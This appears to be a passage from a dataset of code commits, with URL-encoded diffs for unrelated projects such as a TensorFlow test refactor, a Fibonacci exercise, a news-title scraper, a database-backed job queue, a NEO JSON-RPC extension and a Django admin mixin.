self.assertRaises(errors.InvalidArgumentError): get_next = self.getNext(dataset) self.evaluate(get_next()) def testErrorWithInvalidDataset(self): """With a nested dataset op after prefetch, the rewrite should fail.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) dataset = dataset.flat_map(dataset_ops.Dataset.from_tensors) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) with self.assertRaises(errors.InvalidArgumentError): get_next = self.getNext(dataset) self.evaluate(get_next()) if __name__ == "__main__": ops.enable_eager_execution( config=config_pb2.ConfigProto(device_count={"CPU": 3})) test.main()
Python
0
@@ -1140,16 +1140,69 @@ import +combinations%0Afrom tensorflow.python.framework import errors%0Af @@ -1247,58 +1247,8 @@ ops -%0Afrom tensorflow.python.framework import test_util %0Afro @@ -1294,52 +1294,8 @@ t%0A%0A%0A -@test_util.run_all_in_graph_and_eager_modes%0A clas @@ -1377,44 +1377,125 @@ %0A%0A -@test_util.run_v1_only(%22b/121264236%22 +# TODO(b/121264236)%0A @combinations.generate(%0A combinations.combine(tf_api_version=%5B1%5D, mode=%5B%22graph%22, %22eager%22%5D) )%0A @@ -2734,16 +2734,80 @@ _on_2)%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def te @@ -3336,24 +3336,88 @@ range(10))%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def testWi @@ -3807,24 +3807,88 @@ ge(1, 11))%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def testEr @@ -4275,16 +4275,80 @@ ext())%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def te
77094bb723d35fd23d909e0c59b712eeb7612495
Add fibonacci HW
training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py
training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py
Python
0.999987
@@ -0,0 +1,466 @@ +%22%22%22%0ACompute Fibonacci sequence and learn python.%0ASteve Tapp%0A%22%22%22%0Aimport sys%0Aimport timeit%0A%0Afib_seq = %5B0, 1%5D%0Afib_even_sum = 0%0A%0Afor fibnum in range (2, 50):%0A fib_seq.append(fib_seq%5B-2%5D + fib_seq%5B-1%5D)%0A print (fibnum, fib_seq%5Bfibnum%5D)%0A if fib_seq%5B-1%5D %3E= 4000000:%0A break%0A if not fib_seq%5Bfibnum%5D %25 2:%0A print ('even', fib_seq%5Bfibnum%5D)%0A fib_even_sum += fib_seq%5Bfibnum%5D%0A%0Aprint ('Sum of even fibonacci terms under 4 million is ', fib_even_sum)%0A
b1a851d6f5dd47790459564a55405627d9b7a9e4
Add news date and title scrapper from ist's news page.
scripts/webscraping/ist_news_titles.py
scripts/webscraping/ist_news_titles.py
Python
0
@@ -0,0 +1,517 @@ +from urllib.request import urlopen%0Afrom bs4 import BeautifulSoup%0Aimport sys, io%0A%0Asys.stdout = io.TextIOWrapper(sys.stdout.buffer,'cp437','backslashreplace')%0A%0Ahtml = urlopen(%22http://tecnico.ulisboa.pt/pt/noticias/%22)%0AbsObj = BeautifulSoup(html, %22html.parser%22)%0A%0A%0Afor news_wrapper in bsObj.find(%22div%22, %7B%22id%22:%22content_wrapper%22%7D).findAll(%22div%22, %7B%22class%22:%22news_wrapper%22%7D):%0A%09news_grid = news_wrapper.find(%22div%22, %7B%22class%22:%22grid_9 omega%22%7D)%0A%09print(%22Date: %22 + news_grid.p.get_text())%0A%09print(%22Title: %22 + news_grid.h3.a.get_text())
bd9496bf726aff0472a52d6c5e2a0db96f2af8e2
Add allow_skipped_files option to DJANGO_DEFAULTS
djangae/core/management/__init__.py
djangae/core/management/__init__.py
import os import sys import argparse import djangae.sandbox as sandbox from djangae.utils import find_project_root # Set some Django-y defaults DJANGO_DEFAULTS = { "storage_path": os.path.join(find_project_root(), ".storage"), "port": 8000, "admin_port": 8001, "api_port": 8002, "automatic_restart": "False" } def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides): with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides): import django.core.management as django_management # Now on the path return django_management.execute_from_command_line(argv) def execute_from_command_line(argv=None, **sandbox_overrides): """Wraps Django's `execute_from_command_line` to initialize a djangae sandbox before running a management command. Note: The '--sandbox' arg must come first. All other args are forwarded to Django as normal. """ argv = argv or sys.argv parser = argparse.ArgumentParser(prog='manage.py') parser.add_argument( '--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys()) parser.add_argument('args', nargs=argparse.REMAINDER) namespace = parser.parse_args(argv[1:]) overrides = DJANGO_DEFAULTS overrides.update(sandbox_overrides) return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides) def remote_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the remote sandbox""" return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides) def local_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the local sandbox""" return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides) def test_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the test sandbox""" return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
Python
0.000003
@@ -322,16 +322,52 @@ %22False%22 +,%0A %22allow_skipped_files%22: %22True%22, %0A%7D%0A%0A%0Adef
6317a43baed719bddd84863b750018a6ef1287b0
add new test
test/test_canvas.py
test/test_canvas.py
Python
0.000001
@@ -0,0 +1,226 @@ +import sequana.resources.canvas.bar as bar%0A%0A%0A%0Adef test_bar():%0A%0A data = %5B%0A %7B%22name%22:%22A%22, %22data%22:%7B%22R1%22:10, %22R2%22:90%7D%7D,%0A %7B%22name%22:%22B%22, %22data%22:%7B%22R1%22:90, %22R2%22:10%7D%7D%5D%0A bar.stacked_bar(%22title%22, %22ACGT%22, datalist=data)%0A
2d9712f5b1fecb8a1f6c989ed835a9476b5cdab5
Create MeshTextureCoordinates.py
MeshTextureCoordinates.py
MeshTextureCoordinates.py
Python
0.000001
@@ -0,0 +1,1091 @@ +#***********************************************************************************************************#%0A#********* Get normalized 2-D texture coordinates of a mesh object *****************************************#%0A#********* by Djordje Spasic *******************************************************************************#%0A#********* issworld2000@yahoo.com 17-Feb-2015 **************************************************************#%0A%22%22%22%0ARhino 5 SR11 (and all older releases) still does not have RhinoScript MeshTextureCoordinates function implemented for PythonScript.%0AMeshTextureCoordinates returns normalized (between 0 and 1) 2-D texture coordinates of a mesh object. %0ASmall function bellow replicates this functionality.%0A%22%22%22%0A%0Aimport rhinoscriptsyntax as rs%0A%0Adef MeshTextureCoordinates(object_id):%0A meshObj = rs.coercemesh(object_id)%0A mCoordL = %5B%5D%0A for i in range(meshObj.TextureCoordinates.Count):%0A mCoordL.append(meshObj.TextureCoordinates%5Bi%5D)%0A return mCoordL%0A%0AmeshId = rs.GetObject(%22pick up your mesh%22, 32)%0Acoord = MeshTextureCoordinates(meshId)%0Aprint coord%0A
09fb916697f28c423c85dad5f77eebaac3c93199
Correct _get_origin_method
smile_action_rule/models/action_rule_decorator.py
smile_action_rule/models/action_rule_decorator.py
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2010 Smile (<http://www.smile.fr>). All Rights Reserved # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import inspect from openerp import _ from openerp.sql_db import Cursor from openerp.exceptions import Warning def _get_args(self, method, args, kwargs): # avoid hasattr(self, '_ids') because __getattr__() is overridden if '_ids' in self.__dict__: cr, uid, context = self.env.args ids = self._ids else: while True: if not hasattr(method, 'origin'): break method = method.origin method_arg_names = inspect.getargspec(method)[0][1:len(args) + 1] if not method_arg_names: decorator = method._api and method._api.__name__ if decorator in ('multi', 'one'): method_arg_names = ['cr', 'uid', 'ids'] elif decorator == 'model': method_arg_names = ['cr', 'uid'] elif decorator.startswith('cr_'): method_arg_names = decorator.split('_') else: raise Warning(_('Method not adapted for action rules')) method_arg_names += [None] * (len(args) - len(method_arg_names)) method_args = dict(zip(method_arg_names, args)) cr = method_args.get('cr') or method_args.get('cursor') uid = method_args.get('uid') or method_args.get('user') or method_args.get('user_id') if not isinstance(cr, Cursor) or not isinstance(uid, (int, long)): raise Warning(_('Method not adapted for action rules')) ids = method_args.get('ids') or method_args.get('id') context = method_args.get('context') or {} if kwargs.get('context'): context.update(kwargs['context']) if isinstance(ids, (int, long)): ids = [ids] return cr, uid, ids, context def _get_origin_method(method): if hasattr(origin, '_orig'): return origin._orig elif hasattr(origin, 'origin'): return origin.origin def action_rule_decorator(): def action_rule_wrapper(self, *args, **kwargs): method = action_rule_wrapper.origin cr, uid, ids, context = _get_args(self, method, args, kwargs) # Avoid loops or cascading actions if context and context.get('action'): return method(self, *args, **kwargs) context = dict(context or {}, action=True) # Retrieve the action rules to possibly execute rule_obj = self.pool.get('base.action.rule') rule_ids = rule_obj._get_action_rules(cr, uid, self._name, method, context) rules = rule_obj.browse(cr, uid, rule_ids, context) # Check preconditions pre_ids = {} for rule in rules: if rule.kind not in ('on_create', 'on_create_or_write'): pre_ids[rule] = rule_obj._filter(cr, uid, rule, rule.filter_pre_id, ids, context=context) if rule.kind == 'on_unlink' and pre_ids[rule]: rule_obj._process(cr, uid, rule, pre_ids[rule], context=context) # Call original method res = method(self, *args, **kwargs) # Manage create method origin = method while origin: if origin.__name__ == 'create': pre_ids = pre_ids.fromkeys(rules, [res.id] if hasattr(res, 'id') else [res]) break origin = _get_origin_method(origin) # Check postconditions, and execute actions on the records that satisfy them for rule in rules: if rule.kind != 'on_unlink': post_ids = rule_obj._filter(cr, uid, rule, rule.filter_id, pre_ids.get(rule), context=context) if post_ids: rule_obj._process(cr, uid, rule, post_ids, context=context) return res return action_rule_wrapper
Python
0.000261
@@ -2741,22 +2741,22 @@ hasattr( -origin +method , '_orig @@ -2774,22 +2774,22 @@ return -origin +method ._orig%0A @@ -2804,22 +2804,22 @@ hasattr( -origin +method , 'origi @@ -2838,22 +2838,22 @@ return -origin +method .origin%0A
0301a96b8c9592c58fe41eded24a39d503f4fcb2
Create ExtendedJsonRpcApi.py
neo/api/JSONRPC/ExtendedJsonRpcApi.py
neo/api/JSONRPC/ExtendedJsonRpcApi.py
Python
0
@@ -0,0 +1,1802 @@ +from neo.Core.Blockchain import Blockchain%0Afrom neo.api.JSONRPC.JsonRpcApi import JsonRpcApi, JsonRpcError%0Afrom neo.Implementations.Wallets.peewee.UserWallet import UserWallet%0Afrom neocore.UInt256 import UInt256%0Aimport datetime%0A%0A%0Aclass ExtendedJsonRpcApi:%0A %22%22%22%0A Extended JSON-RPC API Methods%0A %22%22%22%0A%0A def get_node_state(self):%0A height = Blockchain.Default().Height%0A headers = Blockchain.Default().HeaderHeight%0A diff = height - JsonRpcApi.start_height%0A now = datetime.datetime.utcnow()%0A difftime = now - JsonRpcApi.start_dt%0A mins = difftime / datetime.timedelta(minutes=1)%0A secs = mins * 60%0A bpm = 0%0A tps = 0%0A%0A if diff %3E 0 and mins %3E 0:%0A bpm = diff / mins%0A tps = Blockchain.Default().TXProcessed / secs%0A%0A return %7B%0A 'Progress': %5Bheight, %22/%22, headers%5D,%0A 'Block-cache length': Blockchain.Default().BlockCacheCount,%0A 'Blocks since program start': diff,%0A 'Time elapsed (minutes)': mins,%0A 'Blocks per min': bpm,%0A 'TPS': tps%0A %7D%0A%0A def get_tx_history(self):%0A if JsonRpcApi.wallet:%0A res = %5B%5D%0A for tx in JsonRpcApi.wallet.GetTransactions():%0A json = tx.ToJson()%0A tx_id = UInt256.ParseString(json%5B'txid'%5D)%0A txx, height = Blockchain.Default().GetTransaction(tx_id)%0A header = Blockchain.Default().GetHeaderByHeight(height)%0A block_index = header.Index%0A json%5B'block_index'%5D = block_index%0A block_timestamp = header.Timestamp%0A json%5B'blocktime'%5D = block_timestamp%0A res.append(json)%0A return res%0A else:%0A raise JsonRpcError(-400, %22Access denied.%22)%0A
04e7a43c9516fc9834727c3087863c6282da2dbf
Add tests.py to app skeleton.
lib/rapidsms/skeleton/app/tests.py
lib/rapidsms/skeleton/app/tests.py
Python
0
@@ -0,0 +1,543 @@ +from rapidsms.tests.scripted import TestScript%0Afrom app import App%0A%0Aclass TestApp (TestScript):%0A apps = (App,)%0A%0A # define your test scripts here.%0A # e.g.:%0A #%0A # testRegister = %22%22%22%0A # 8005551212 %3E register as someuser%0A # 8005551212 %3C Registered new user 'someuser' for 8005551212!%0A # 8005551212 %3E tell anotheruser what's up??%0A # 8005550000 %3C someuser said %22what's up??%22%0A # %22%22%22%0A #%0A # You can also do normal unittest.TestCase methods:%0A #%0A # def testMyModel (self):%0A # self.assertEquals(...)%0A
d358bf3f103069c2f5a85da15331f808df746064
Bump version
oi/version.py
oi/version.py
VERSION = '0.2.1'
Python
0
@@ -10,9 +10,9 @@ '0. -2.1 +3.0 '%0A
19beca7e8166cbab42937ccbd8e9c705ca4913dd
Bump version
oi/version.py
oi/version.py
VERSION = '0.0.1'
Python
0
@@ -10,9 +10,9 @@ '0. -0.1 +1.0 '%0A
6f2a9cbf9e571855074e898d22480d61277a3eda
Add experimental polling DB backend.
django_lightweight_queue/backends/db.py
django_lightweight_queue/backends/db.py
Python
0
@@ -0,0 +1,2272 @@ +import time%0Aimport datetime%0A%0Afrom django.db import connection, models, ProgrammingError%0A%0Afrom ..job import Job%0A%0Aclass DatabaseBackend(object):%0A TABLE = 'django_lightweight_queue'%0A%0A FIELDS = (%0A models.AutoField(name='id', primary_key=True),%0A models.CharField(name='queue', max_length=255),%0A models.TextField(name='data'),%0A models.DateTimeField(name='created'),%0A )%0A%0A def __init__(self):%0A qn = connection.ops.quote_name%0A%0A sql = %5B%5D%0A for x in self.FIELDS:%0A sql.append(' '.join((%0A qn(x.name),%0A x.db_type(connection=connection),%0A 'PRIMARY KEY' if x.primary_key else '',%0A )))%0A%0A cursor = connection.cursor()%0A cursor.execute('CREATE TABLE IF NOT EXISTS %25s (%5Cn%25s%5Cn);' %25 (%0A qn(self.TABLE),%0A ',%5Cn'.join(sql),%0A ))%0A%0A try:%0A cursor.execute('CREATE INDEX %25s ON %25s (%25s, %25s)' %25 (%0A qn('%25s_idx' %25 self.TABLE),%0A qn(self.TABLE),%0A qn('queue'),%0A qn('created'),%0A ))%0A except ProgrammingError:%0A # %22IF NOT EXISTS%22 is not portable, so we just fail to create it%0A pass%0A%0A # Don't share connections across fork()%0A connection.close()%0A%0A def enqueue(self, job, queue):%0A cursor = connection.cursor()%0A cursor.execute(%22%22%22%0A INSERT INTO %25s (queue, data, created) VALUES (%25%25s, %25%25s, %25%25s)%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (%0A queue,%0A job.to_json(),%0A datetime.datetime.utcnow(),%0A ))%0A%0A def dequeue(self, queue, timeout):%0A cursor = connection.cursor()%0A cursor.execute(%22%22%22%0A SELECT id, data FROM %25s WHERE queue = %25%25s%0A ORDER BY created ASC LIMIT 1%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (queue,))%0A%0A try:%0A id_, data = cursor.fetchall()%5B0%5D%0A except (IndexError, ProgrammingError):%0A time.sleep(timeout)%0A return%0A%0A cursor.execute(%22%22%22%0A DELETE FROM %25s WHERE id = %25%25s%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (id_,))%0A%0A try:%0A return Job.from_json(data)%0A except TypeError:%0A pass%0A
2498e40294cf56f40fb869d30844c3a8223267a0
Create initdb command
initdb.py
initdb.py
Python
0.000001
@@ -0,0 +1,57 @@ +#!/usr/bin/env python%0Afrom app import db%0Adb.create_all()%0A
3c8eb0563f3997fc068d039b18452eaa98da3122
Add a script useful for downloading large avatar images from Atom feeds
download_avatars.py
download_avatars.py
Python
0
@@ -0,0 +1,1462 @@ +#!/usr/bin/env python3%0Aimport PIL.Image%0Aimport io%0Aimport json%0Aimport requests%0A%0Aimport post_list%0Aimport web_cache%0A%0A%0A# Split this file into two modules, because we need to move web_cache out of%0A# the way between the two steps. (We want to isolate the avatar HTTP requests)%0A# into its own thing.%0A%0A%0Adef _make_avatar_url_list():%0A seen = set()%0A with open(%22avatar_urls%22, %22wt%22) as fp:%0A for post in post_list.load_posts():%0A url = %22https://thearchdruidreport.blogspot.com/feeds/%25s/comments/default%22 %5C%0A %22?alt=json&v=2&orderby=published&reverse=false&max-results=1000%22 %25 post.postid%0A js = json.loads(web_cache.get(url).decode(%22utf8%22))%0A for comment in js%5B%22feed%22%5D%5B%22entry%22%5D:%0A (author,) = comment%5B%22author%22%5D%0A avatar = author%5B%22gd$image%22%5D%0A int(avatar%5B%22width%22%5D)%0A int(avatar%5B%22height%22%5D)%0A src = avatar%5B%22src%22%5D%0A if src not in seen:%0A seen.add(src)%0A assert %22%5Cn%22 not in src%0A fp.write(src + %22%5Cn%22)%0A%0A%0Adef _fetch_avatar_urls():%0A urls = open(%22avatar_urls%22, %22r%22).read().splitlines()%0A for i, url in enumerate(urls):%0A print(%22%5B%25d/%25d%5D fetching %25s ...%22 %25 (i + 1, len(urls), url))%0A try:%0A img = PIL.Image.open(io.BytesIO(web_cache.get(url)))%0A except:%0A print(%22WARNING: Bad avatar URL: %25s%22 %25 url)%0A%0A%0A#_make_avatar_url_list()%0A_fetch_avatar_urls()%0A
7e1ea3516aa6b4d41748a9ae63464a32ff16e018
Test variable module
extenteten/variable_test.py
extenteten/variable_test.py
Python
0.000001
@@ -0,0 +1,259 @@ +from .util import static_shape, static_rank%0Afrom .variable import variable%0A%0A%0Adef test_variable():%0A shape = %5B123, 456%5D%0A assert static_shape(variable(shape)) == shape%0A%0A initial = %5Bfloat(n) for n in shape%5D%0A assert static_rank(variable(initial)) == 1%0A
58f85213c72b194fe44da36972436c4e7bbdd681
add sina http util
server/crawler/sinawb/SinaHttpUtil.py
server/crawler/sinawb/SinaHttpUtil.py
Python
0.000002
@@ -0,0 +1,2334 @@ +# -*- coding:utf-8 -*-%0A%22%22%22%0AAuthor: AsherYang%0AEmail : ouyangfan1991@gmail.com%0ADate : 2017/11/22%0ADesc : Sina Http Util %E5%8F%82%E8%80%83 Shserver %E5%BE%AE%E5%BA%97 OpenRequest.py%0A%22%22%22%0A%0Atry:%0A from cStringIO import StringIO%0Aexcept ImportError:%0A from StringIO import StringIO%0Aimport gzip, json, urllib, urllib2, collections,time,logging%0A%0Adef http_get(url,params=%7B%7D,header=%7B%7D):%0A httpUrl=url%0A if params is not None and len(params)%3E0:%0A httpUrl=url+%22?%22+_encode_params(**params)%0A httpUrl=httpUrl.replace(': ',':')%0A httpUrl=httpUrl.replace(', ',',')%0A httpUrl=httpUrl.replace(%22'%22,'%22')%0A print httpUrl%0A req=urllib2.Request(httpUrl,None,headers=header)%0A res=urllib2.urlopen(req)%0A body=_read_body(res)%0A # check_status(body)%0A return body%0A%0Adef http_post(url,params=%7B%7D,header=%7B%7D):%0A req=urllib2.Request(url)%0A for k,v in header:%0A req.add_header(k,v)%0A res=urllib2.urlopen(req,data=params,header=header)%0A body=_read_body(res)%0A # check_status(body)%0A return body%0A%0A# def check_status(resJson,statusName=%22status%22,code=%22status_code%22,reason=%22status_reason%22):%0A# if(resJson is None ):%0A# raise OpenError(%2210001%22,%22%E7%B3%BB%E7%BB%9F%E9%94%99%E8%AF%AF,%E8%BF%94%E5%9B%9E%E7%9A%84%E7%BB%93%E6%9E%9C%E4%B8%BA%E7%A9%BA%22,None)%0A# res_dic=json.loads(resJson)%0A# if(res_dic.get(statusName) is None):%0A# raise OpenError(%2210001%22,%22%E7%B3%BB%E7%BB%9F%E9%94%99%E8%AF%AF,%E7%8A%B6%E6%80%81%E7%A0%81%E4%B8%BA%E7%A9%BA%22,None)%0A# status_code=res_dic.get(statusName).get(code)%0A# status_reason=res_dic.get(statusName).get(reason)%0A# if(0!=status_code and %220%22!=status_code):%0A# raise OpenError(status_code,status_reason,None)%0A%0A%0Adef _encode_params(**kw):%0A params = %5B%5D%0A for k, v in kw.iteritems():%0A if isinstance(v, basestring):%0A qv = v.encode('utf-8') if isinstance(v, unicode) else v%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A elif isinstance(v, collections.Iterable):%0A for i in v:%0A qv = i.encode('utf-8') if isinstance(i, unicode) else str(i)%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A else:%0A qv = str(v)%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A return '&'.join(params)%0A%0A%0Adef _read_body(res):%0A using_gzip = res.headers.get('Content-Encoding', '')=='gzip'%0A body = res.read()%0A if using_gzip:%0A gzipper = gzip.GzipFile(fileobj=StringIO(body))%0A body = gzipper.read()%0A gzipper.close()%0A return body%0A
54285887dc96e3d5d98ca4c02df2a04d49ac69f7
Add TeamPermission tests
tests/sentry/api/bases/test_team.py
tests/sentry/api/bases/test_team.py
Python
0
@@ -0,0 +1,2643 @@ +from __future__ import absolute_import%0A%0Afrom mock import Mock%0A%0Afrom sentry.api.bases.team import TeamPermission%0Afrom sentry.models import ApiKey, OrganizationMemberType, ProjectKey%0Afrom sentry.testutils import TestCase%0A%0A%0Aclass TeamPermissionBase(TestCase):%0A def setUp(self):%0A self.org = self.create_organization()%0A self.team = self.create_team(organization=self.org)%0A super(TeamPermissionBase, self).setUp()%0A%0A def has_object_perm(self, auth, user, obj, method='GET'):%0A perm = TeamPermission()%0A request = Mock()%0A request.auth = auth%0A request.user = user%0A request.method = method%0A return perm.has_object_permission(request, None, obj)%0A%0A%0Aclass TeamPermissionTest(TeamPermissionBase):%0A def test_regular_user(self):%0A user = self.create_user()%0A assert not self.has_object_perm(None, user, self.team)%0A%0A def test_superuser(self):%0A user = self.create_user(is_superuser=True)%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_without_team_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=False,%0A )%0A assert not self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_with_global_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=True,%0A )%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_with_team_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=False,%0A )%0A om.teams.add(self.team)%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_project_key(self):%0A key = ProjectKey.objects.create(%0A project=self.create_project(team=self.team),%0A )%0A assert not self.has_object_perm(key, None, self.team)%0A%0A def test_api_key_with_org_access(self):%0A key = ApiKey.objects.create(%0A organization=self.org,%0A )%0A assert self.has_object_perm(key, None, self.team)%0A%0A def test_api_key_without_org_access(self):%0A key = ApiKey.objects.create(%0A organization=self.create_organization(),%0A )%0A assert not self.has_object_perm(key, None, self.team)%0A
aeabc254a09047a58ea5b5c16fb2c5e7e9008691
Test generator expressions
tests/samples/generator_expression.py
tests/samples/generator_expression.py
Python
0.000001
@@ -0,0 +1,1503 @@ +import snoop%0A%0A%0A@snoop(depth=2)%0Adef main():%0A return list(x * 2 for x in %5B1, 2%5D)%0A%0A%0Aif __name__ == '__main__':%0A main()%0A%0Aexpected_output = %22%22%22%0A12:34:56.78 %3E%3E%3E Call to main in File %22/path/to_file.py%22, line 5%0A12:34:56.78 5 %7C def main():%0A12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 %3E%3E%3E Start generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 1%0A 12:34:56.78 %3C%3C%3C Yield value from %3Cgenexpr%3E: 2%0A 12:34:56.78 %3E%3E%3E Re-enter generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 2%0A 12:34:56.78 %3C%3C%3C Yield value from %3Cgenexpr%3E: 4%0A 12:34:56.78 %3E%3E%3E Re-enter generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 2%0A 12:34:56.78 %3C%3C%3C Return value from %3Cgenexpr%3E: None%0A12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A12:34:56.78 %3C%3C%3C Return value from main: %5B2, 4%5D%0A%22%22%22%0A
8e049c956045b3d5cc37db0041e71b637f556408
add DB migration
migrations/versions/2316c9808a5_.py
migrations/versions/2316c9808a5_.py
Python
0
@@ -0,0 +1,1103 @@ +%22%22%22empty message%0A%0ARevision ID: 2316c9808a5%0ARevises: 26fbbffb991%0ACreate Date: 2015-04-16 13:46:41.849087%0A%0A%22%22%22%0A%0A# revision identifiers, used by Alembic.%0Arevision = '2316c9808a5'%0Adown_revision = '26fbbffb991'%0A%0Afrom alembic import op%0Aimport sqlalchemy as sa%0A%0A%0Adef upgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.add_column('courses', sa.Column('homepage', sa.Text(), nullable=True))%0A op.add_column('teachers', sa.Column('avatar', sa.Integer(), nullable=True))%0A op.add_column('teachers', sa.Column('homepage', sa.Text(), nullable=True))%0A op.create_foreign_key(None, 'teachers', 'image_store', %5B'avatar'%5D, %5B'id'%5D)%0A op.add_column('users', sa.Column('homepage', sa.Text(), nullable=True))%0A ### end Alembic commands ###%0A%0A%0Adef downgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.drop_column('users', 'homepage')%0A op.drop_constraint(None, 'teachers', type_='foreignkey')%0A op.drop_column('teachers', 'homepage')%0A op.drop_column('teachers', 'avatar')%0A op.drop_column('courses', 'homepage')%0A ### end Alembic commands ###%0A
0ca24ff03f6382c23995f662b678e457a8394140
Add script to bump symbol versions
debian/bump-symbols.py
debian/bump-symbols.py
Python
0
@@ -0,0 +1,1090 @@ +#!/usr/bin/python%0A#%0A# Bump symbol versions of libvirt0%0A%0A# Usage: ./bump-symbol-versions 1.2.16~rc2%0A%0Aimport os%0Aimport re%0Aimport sys%0Aimport shutil%0Aimport subprocess%0A%0A#import gbp.git.GitRepository%0A%0Asymbols_file = 'debian/libvirt0.symbols'%0Asymbols_new_file = symbols_file + '.new'%0A%0Asymbols = open(symbols_file)%0Asymbols_new = open('%25s.new' %25 symbols_file, 'w+')%0A%0Aif len(sys.argv) != 2:%0A print %3E%3Esys.stderr, %22Need a version%22%0A sys.exit(1)%0A%0Aversion = sys.argv%5B1%5D%0As_version = version.split('~', 1)%5B0%5D%0A%0Afor line in symbols.readlines():%0A m = re.match('(?P%3Cpre%3E.*LIBVIRT_(?P%3Cadmin%3EADMIN_)?PRIVATE_)(?P%3Cv%3E%5Ba-z0-9.%5D+) ',%0A line)%0A if m:%0A if not m.group('admin'):%0A symbols_new.write(' *@LIBVIRT_%25s %25s%5Cn' %25 (s_version, version))%0A symbols_new.write(%22%25s%25s %25s%5Cn%22 %25%0A (m.group('pre'), s_version, version))%0A else:%0A symbols_new.write(line)%0A%0A%0Asymbols.close()%0Asymbols_new.close()%0A%0Aos.unlink(symbols_file)%0Ashutil.move(symbols_new_file, symbols_file)%0Asubprocess.call(%5B'git', 'commit', '-m', 'Bump symbol versions', symbols_file%5D)%0A%0A
4435eb504b10855088f006456dfface89a4a8798
create first easy mixin
easy/admin/mixin.py
easy/admin/mixin.py
Python
0
@@ -0,0 +1,1668 @@ +# coding: utf-8%0Afrom django.conf.urls import url%0Afrom django.contrib import messages%0Afrom django.core.urlresolvers import reverse%0Afrom django.http.response import HttpResponseRedirect%0A%0A%0Aclass MixinEasyViews(object):%0A%0A def get_urls(self):%0A urls = super(MixinEasyViews, self).get_urls()%0A%0A info = self.model._meta.app_label, self.model._meta.model_name%0A%0A easy_urls = %5B%0A url(r'%5E(?P%3Cpk%3E.+)/easy/(?P%3Caction%3E.+)/$', self.admin_site.admin_view(self.easy_object_view),%0A name='%25s_%25s_easy' %25 info),%0A%0A url(r'%5Eeasy/(?P%3Caction%3E.+)/$', self.admin_site.admin_view(self.easy_list_view),%0A name='%25s_%25s_easy' %25 info),%0A %5D%0A%0A return easy_urls + urls%0A%0A def easy_object_view(self, request, pk, action):%0A%0A method_name = 'easy_view_%25s' %25 action%0A%0A view = getattr(self, method_name, None)%0A if view:%0A return view(request, pk)%0A%0A self.message_user(request, 'Easy view %25s not founded' %25 method_name, messages.ERROR)%0A%0A info = self.model._meta.app_label, self.model._meta.model_name%0A redirect = reverse('admin:%25s_%25s_change' %25 info, args=(pk,))%0A%0A return HttpResponseRedirect(redirect)%0A%0A def easy_list_view(self, request, action):%0A method_name = 'easy_view_%25s' %25 action%0A%0A view = getattr(self, method_name, None)%0A if view:%0A return view(request)%0A%0A self.message_user(request, 'Easy view %25s not founded' %25 method_name, messages.ERROR)%0A%0A info = 